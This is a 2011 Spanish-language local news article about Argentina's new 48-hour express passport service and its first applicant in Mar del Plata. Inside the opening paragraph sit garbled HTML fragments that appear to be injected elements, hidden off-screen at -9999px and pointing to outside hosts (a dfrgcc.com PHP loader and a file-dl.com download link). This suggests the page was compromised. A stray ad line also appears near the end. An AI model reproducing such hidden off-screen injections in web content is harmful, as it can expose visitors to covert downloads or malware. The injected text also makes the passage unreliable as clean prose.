26/08/2011, Locales

En Mar del Plata ya se tramitó el primer Pasaporte Express

Luego que el ministro del Interior, Florencio Randazzo, anunciara este jueves que ya funciona un nuevo servicio especial para tramitar el pasaporte en sólo 48 horas, con una tasa adicional de 500 pesos, Mar del Plata ya tuvo a su primer interesado. / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

Normalmente tarda entre diez y quince días el trámite del pasaporte normal, ese que vale $130. Sin embargo, el “express”, que sirve para “quienes necesitan viajar urgente” cuesta $500 más y en 48 horas está listo. Que se puede pagar con tarjeta de crédito o por Internet.

Al presentar el nuevo sistema exprés, en la Casa de Gobierno, Randazzo señaló que el pago adicional queda exceptuado en caso de “cuestiones humanitarias” y especificó que dentro de esta categoría se incluye a personas que deban viajar al exterior por razones de salud.

En marzo pusimos una red que hace que el pasaporte pueda estar en 15 días en la casa del ciudadano por un valor de 130 pesos. Ahora, hemos sumado un servicio exprés, que se puede tramitar por Visa o Mastercard. Se entrega en un plazo máximo de 48 horas y tiene un valor de 500 pesos”, detalló el ministro.

Sobre las motivaciones del nuevo servicio, el funcionario admitió la existencia de un régimen de privilegio para un sector de la sociedad que, gracias a los contactos con funcionarios del Gobierno, obtiene el documento con mayor celeridad. “Encontramos que se había instalado un régimen de privilegio a través de aquellos que tienen contactos con funcionarios y pedían el rescate anticipado”, lo que generaba varios inconvenientes, según dijo el ministro. A partir de ahora, “quien quiera rescatar antes su pasaporte tendrá que pagar una tasa adicional de 500 pesos, que es lo que vale el servicio exprés de este documento, que llegará por correo premium y para el que habrá personal afectado especialmente a esta tarea”, agregó Randazzo.

El trámite se inicia con el pedido de turno por Internet en la página www.mininterior.gov.ar/pasaporte/index.php, o a través del 0800-9999-364, de lunes a viernes, de 8 a 20. En tanto, para tramitar el nuevo pasaporte, en Mar del Plata, se lo puede hacer en la calle 20 de septiembre y Belgrano.



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy